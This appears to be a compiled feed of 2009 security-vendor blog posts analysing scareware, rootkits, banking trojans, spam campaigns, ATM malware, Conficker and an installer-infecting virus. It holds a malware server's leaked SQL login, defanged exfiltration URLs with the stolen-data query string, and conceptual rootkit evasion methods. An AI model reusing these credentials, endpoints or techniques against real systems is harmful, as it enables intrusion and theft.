It has been almost a year since the rogue antivirus products, a.k.a. scareware, became rampant.  These Trojan families are typically spread via Drive by downloads, SEO poisoning, Spam campaigns and clever social engineering.
Having these methods discussed in earlier blogs, today we will look into the protection mechanisms adopted by these fake alerts Trojan families to evade detection from antivirus vendors.

• Code obfuscation using junk instructions

In the above screenshot, lots of junk code is visible between valid instructions. Usage of junk instructions is being used widely across Fake Alert families.

• Fake API calls

The screen shot shows the usage of API called SetArcDirection which is not necessary in the code. These kinds of unnecessary APIs are used by malware to defeat emulation. Sometimes, API calls that don’t exist are also used by these families to check if they are being emulated.

• Customized packer

Lot of fake alert families uses their own custom packers, encryption routines.  Some of the families patch the existing packers.

• Use of XMM and MMX instruction sets

Usage of XMM, MMX and FPU instructions which are not needed in the code along with the other junk code are also utilized by most of the fake alert families.

The techniques discussed above are not something very new and has been used in notable malware. But fake alert Trojans use these evasion techniques to there full potential with every new variant. Just when we thought we’re seeing a decline in adware and spyware – fake alert Trojans families have stepped in to claim the scum of the Internet tag.

A few days ago I got a chance to look at a recent variant of the DNSChanger.ad. It drops a common rootkit that is mostly associated with FakeAlert and DNSChanger Trojans. Over a period of time the dropped sys file names have changed from tdss*.sys to seneka*.sys to skynet*.sys and so on. Our memory detection and cleaning for this rootkit is Generic Rootkit.d. The techniques of this threat are well known now. It basically uses inline hooks on IofCallDriver, IofCompleteRequest, NtFlushInstructionCache, NtEnumerateKey, etc. This Trojan removes permissions from its registry entries as well.

The malware has a hidden sys file in the system32\drivers directory with a name like skynet*.sys. One can use a rootkit analysis tool or just windbg to restore the inline hooks installed by the malware. Even though the malicious file is no longer hidden after hook restoration, the malware can recreate the file after its deletion. It is common that malware try to “watch” or recreate their components but the curious thing was that File Monitor (filemon) did not show any activity and other API-tracing approaches also didn’t point to anything that could explain the rebirth of this file.

Taking a closer look, we found that the malware uses one of the delayed system worker threads to call, at regular intervals, ZwCreateFile in a loop created using KeDelayExecutionThread. The following figure shows the relevant malware code and thread.

This explains how the file is recreated after its deletion. This thread also watches the malware’s registry. This thread continuously restores the system service descriptor table (SSDT) using the code shown below. So any tracing utility that hooks SSDT to monitor activity would not work.

If it were just SSDT rewriting, then filemon should have reported the file activity. But the malware also removes all filesystem filter drivers; because filemon also uses a filesystem filter, it didn’t report anything. The figure below shows the device stack before and after infection. Note that all filters are removed after infection.

And here is the code that removes attached filters.

Actually the attached device field only for NTFS is nulled out, and the rest of the stack remains dangling.

Figure 3 also shows that not only is the filemon filter driver removed but even the Filter Manager has been effectively removed. Removing all filters and rewriting SSDT will thwart analysis tools that use these techniques but may also break other software as well. Obviously it does not matter to malware as long as its rootkit works in a stealthy manner in most environments. It’s a tradeoff that many malware make and this one has made its choice.

The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is a part of the actual SQL query to log into the malicious SQL server:

Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

mengmeng has been malicious, and what’s more, was careless to leave his login credentials in the open. Please keep your DATs updated to stay secure!

So, Iran had elections this weekend. Some people don’t agree with the results. As a consequence, some people are organizing DDoS attacks against Iranian websites, more precisely:

http://www.leader.ir/
http://president.ir/
http://www.irib.ir/
http://www.iribnews.ir/

and some specific URLs on those domains.

No guys, that’s not the right path and, as it is a malicious activity, we are detecting the tools being distributed to create this DDoS. In my opinion, I doubt that it would cause much damage, since this looks more like a media thing than a huge DDoS attack. The applications use old techniques and unless there are lots of “followers,” I don’t think that it will cause much impact. We will continue to monitor the situation.

Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

We frequently encounter password stealers and backdoors in computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see these malware directly implemented in banks’ automated teller machines. In these cases, Trojans have to be installed by people who have physical access to the machines. Data collecting and malware removal would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3,  The Register also raised public awareness by covering the story. 

When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also-–through a password-protected routine–control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:

If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :).

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles…..

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use it if you can avoid it.

It was very encouraging to see that more than 40 people came to Budapest, Hungary, to discuss and agree on new industry standards as part of the effort undertaken by the Anti-Malware Standards Organization (www.amtso.org.) The awesome historic surroundings set the mood for our discussions.

Seeing such a great turnout in the current economic climate shows how much AMTSO members care about raising the standards of testing anti-malware products. Especially considering the recent rise in the number of rogue security products (such as the now infamous “Anti-virus XP 2009″), it is clear that we need transparent and fair testing more than ever.

AMTSO members finalized and adopted several new documents to the current portfolio. (Have a look at the collection of documents here: www.amtso.org/documents.html.)

But I would like to draw your attention to two papers that, in my opinion, represent very significant steps for the security industry as a whole.

• The first one is “AMTSO Analysis of Reviews Process,” and it presents the process of analyzing reviews. The creation of such a process paves the way to highlight great reviews and/or to expose substandard tests in public. (AMTSO promises to publish all the analyses they undertake.) I really hope that this process, designed to be transparent and fair, will improve the quality of testing and benefit both the developers and consumers of anti-malware technology. If you have doubts that this process is going to be unbiased I will remind you that AMTSO members work for competing security companies, and there would not be a snowball’s chance in hell to agree on the process if it were not designed to be fair. The next step is to put the “AMTSO Analysis of Reviews Process” into practice. I cannot wait to see how it will go.
• “AMTSO Best Practices for Testing In-the-Cloud Security Products” is the second very important milestone. Some anti-virus products started using “cloud” technologies (such as McAfee’s Artemis, which was launched in the beginning of 2008) and the number of cloud-based products is growing; so there is a need to address the fundamental problems associated with testing solutions that are not under the control of the tester. (That is, part of the product is not “in the hands” of the tester; moreover, it can change at any moment in time.) I think it is amazing that representatives of so many competing security companies agreed on fair and scientific principles of how to test cloud-based products. To be honest, when we started this effort we were rather sceptical about finding a sensible way to address all the problems that testers face when evaluating such technologies. The adoption of AMTSO best practices for testing in-the-cloud products means that our brainstorming was successful. I am very pleased to see the agreed results adopted and published. Thanks for that effort go to all the security researchers who contributed to the document and all AMTSO members who voted for it.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

In March 2009, we notified our customers on a new variant of the infamous Vundo trojan family which we detected as Ransom-F and raised its risk assessment to a Low-Profiled threat.  It was possibly the first indicators of a shift in the FakeAlert criminal model from instilling fear, to holding information technology resources for ransom but certainly not the last.

Last week, we came across to a new variant of a rogue security program branded by its creators as “System Security 2009″ and detected them as FakeAlert-CO, and some of its past similarly branded cousins as FakeAlert-SystemSecurity.

The updated variants were discovered from a web page hosted on trustedw{blocked}security.com.As most other rogue security programs to date, FakeAlert-CO displays spurious alerts and making fraudulent claims of infections that requires the user to pay a fee to “repair”. Following the trend of Ransom-F, we noticed “new features” in FakeAlert-COthat resembles some common characteristics of ransomware trojans.

Once installed, FakeAlert-CO may either terminates all running user process or prompts the user to reboot.

In either cases, it follows to pretend to perform a system scan and report detections of false and exaggerated threats.

What differs it from older variants, is that the user will no longer be allowed to open or execute any applications including Task Manager, Command Prompt or other system and office applications which are terminated by FakeAlert-CO. A message is displayed to the user to indicate that the files are infected and to resolve the issue, the user must activate FakeAlert-CO at a cost.

The “product” website is made to look fairly professional offering an option to purchase a 2-year license, or lifetime support license at a “discount” and even comes with 30-day money back guarantee!

You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

Uninstalling the System Security “product” will not be an option for the typical user, as there is neither an uininstaller function nor will the “Add or Remove Programs” in the control panel be allowed to be opened via the usual means.

However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

Affected VirusScan users may remove this threat using the latest DATs and engine.

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

Today I came across a program that claims to be an installer for the VLC media player. Innocent, right? Guess again. For starters, the installation file was different from that supplied by the legitimate VLC media player site.

At Step 3 of the installation I saw this dialog box:

The translation of the message from French is, “HELP US IMPROVE OUR SERVICE. To obtain your activation code call [number removed]. To receive your code in SMS send the keyword CODE to [number removed].” This is a case of SMS fraud!

As usual, we shouldn’t install programs from sources that we don’t trust. In our case, we know from Step 3 of the installation that we’re dealing fraudsters. So why continue with the installation?

We detect this Trojan as Ransom-E, updated in the 5597 DATs.

New variants of the StealthMBR trojan aka Mebroot rootkit have recently been spotted in-the-wild. These new variants are significantly different from earlier ones.

StealthMBR has arguably been dubbed as the stealthiest rootkit ever seen. The new variants are using even ‘deeper’ techniques to evade detection. Broadly speaking, they are hijacking kernel objects (device object) to filter out access to the master boot record and prevent detection and repair. As opposed to earlier variants, which installed lower level hooks on the IRP table of \driver\disk, these new variants are able to hook the IRP table of an even lower driver. And these hooks too are not present all the time but only installed on an on-demand basis. The hijacked disk device object is used to facilitate this. Detection is not the only problem; this threat also poses cleaning challenges by installing watching mechanisms to re-infect the machine. The following image show what an infected MBR looks like. Booting off of an external medium and inspecting should reveal the infected MBR.

The following image shows hijacked kernel object for disk device.

Once installed this threat does not require any file or registry entry to sustain itself on the compromised machine. But for installation to occur there is a dropper executable which has also changed as compared to older variants. The detection for new droppers is added as StealthMBR.a. The good thing is, we already had proactive detection for some dropped files as PWS-JA.gen.a. This should help identify problems and prevent users from getting infected in the first place. We have also developed a solution for detecting and removing this threat once a machine is compromised. It is currently under QA and will be delivered through regular DAT updates very shortly.

While we are on this subject, we also wanted to plug an upcoming webcast. We will be discussing the workings of StealthMBR rootkit and how we deliver solutions for complex threats like these through regular DAT updates without the need for special stand-alone tools. This webcast will also cover the current rootkit trends & techniques. Come and learn about how to prevent rootkit incidents in your environment and how to tackle such incidents if unfortunately they do occur. See you there!

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we had discussed in our previous blog, it is spread through pirated software at this point (a huge No, No anyway) so hopefully distribution will be light and not result in a large numbers. It definitely does highlight the need for security software regardless of platform!

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again - starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen - or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch - so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as - Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. - Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

Do you remember what the first goal of file infector distribution is? It is demand. Without demand, infected files may never be downloaded by end users. What is the second goal? To stay undetected by most AV products. A week ago we found a new file infector that fits the bill.

Nowadays, instead of relying on mass mailing, malware authors are specifically attacking individual companies producing popular software. We’ve been contacted by several software development companies with a similar issue - suspected malware on their machines. Somebody noticed that hashes calculated for setup installers and packages distributed to million of customers were different from what they should have originally been.

Brief reference - “Setup package installer application creates executable installation wizard of windows program without changing software functionality and data file integrity. Advanced setup creator tool generates program setup self extracting file by adding company name, version, setup name, desktop icon, copyright text, start menu icon, installation folder path and license agreement. Setup generator program includes multiple application files into single executable .exe setup with full install and uninstall feature.”

Packages (executable files) were self protected using strong integrity checks, some were digitally signed. This is common for professional setup builder tools producing self extracting executables; to check integrity of the installer before uncompressing and extracting data in order to protect the product and make sure it is not damaged or modified. Checksums and similar protection features are implemented in every popular self extracting archives (WinRar, WinZip), installers (NSIS, Astrum, InstallShield), and software protection systems (ASProtect, Themida or Armadillo). If anything happens to the installer, e.g. any single byte is modified - the end user will be notified with an error message. But in this particular case none of the users reported any problems while running packages / installers, no warnings were raised by any AV products either.

We’ve received about 5 different samples. All executables were created with either commercial or open source setup builders, were packed, and contained overlay (extra data at the end of the file) where installers typically keep compressed and/or encrypted data. Upon execution, samples did not perform any visible and unexpected activity, extracted files were clean (majority of executables were digitally signed and had a valid signature). Since the files inside the installers are not modified, the only way malware can be distributed is by modifying the installers themselves, so Avert Labs Research Team was notified to take a closer look on suspicious files.

Within about 30 minutes, a new generic signature “W32/Winemmem” was added to the database to detect a new file infector and clean the virus body in order to remove the detected virus from the file, so that the file can be used safely.

Let’s go ahead and follow the virus logic to understand what it does and see how it was possible to infect installers and bypass self integrity checking. W32/Winemmem infects packages, installers, and self-extracting archives (files with extra data, so called “overlay”). It rewrites the code section of the original application (1) and relocates a random size block of code from the beginning of code section and OEP (2) to the end of the file (3 and 4 below accordingly), increasing the size of extra data. This Virus does not create new sections; it does not modify the PE header. In order to gain control when an infected file is run the Virus rewrites the original code located at entry point:

Once an infected executable is executed, the virus hooks the CreateFileA() API. W32/Winemmem gains control and searches for Windows PE executables in the Program Files folder. It then parses the Import Table and searches for system dynamic link libraries (DLL) associated with executables (EXE). Next, the virus copies the found DLL to the same folder that contains the found EXE file and infects the copied DLL by modifying code at the Entry-Point and appending the virus body to the end of last section, so that malicious code is executed every time any of the infected EXE files are run. Upon execution of any “infected” files in Program Files folder, virus hooks the WS2_32.dll Send() API and performs malicious activity the first time an infected application calls it. It may infect files on removable drives by searching the entire drive for suitable executables, or download and execute files from remote hosts.

So, since the original setup installer is modified, code section and file sizes are changed; why doesn’t the application perform self integrity checking; why aren’t users warned? Once an infected file is executed, the virus restores the original application on disk by rewriting data from the beginning of code section and OEP back to file. In order to prevent the classic interceding update scenario, Windows locks the file and it is not possible to write to it. In order to bypass that, the virus drops a kernel-mode rootkit (MD5: CE769EAE2F1A7A4ED622C15E715D851E) and hooks a kernel-mode API located in ntoskrnl.exe (the function name is concealed for a security reasons). According to our research, this routine is called by the file system before deleting or opening any file for write access. All the rootkit needs to do is to hook the API and check for input parameters. That’s exactly what it does - patches the first 8 bytes to return 1 in all the cases, by rewriting the beginning of the API with two instructions:

8 bytes and you can delete any file on disk no matter whether it is running executable, loaded dynamic link library, or any other file locked by some process. While testing it, I managed to delete entire Windows folder without any errors or questions from secure operating system.

But what is the purpose of hooking the ExitProcess() and ExitWindowsEx() API’s? Since the original file on disk does not contain the virus body anymore (remember, the virus is in memory and the file on disk was fixed in order to bypass integrity checks), W32/Winemmem needs to infect the file again once user tries to close the installer (ExitProcess) or reboot the system (ExitWindowsEx).

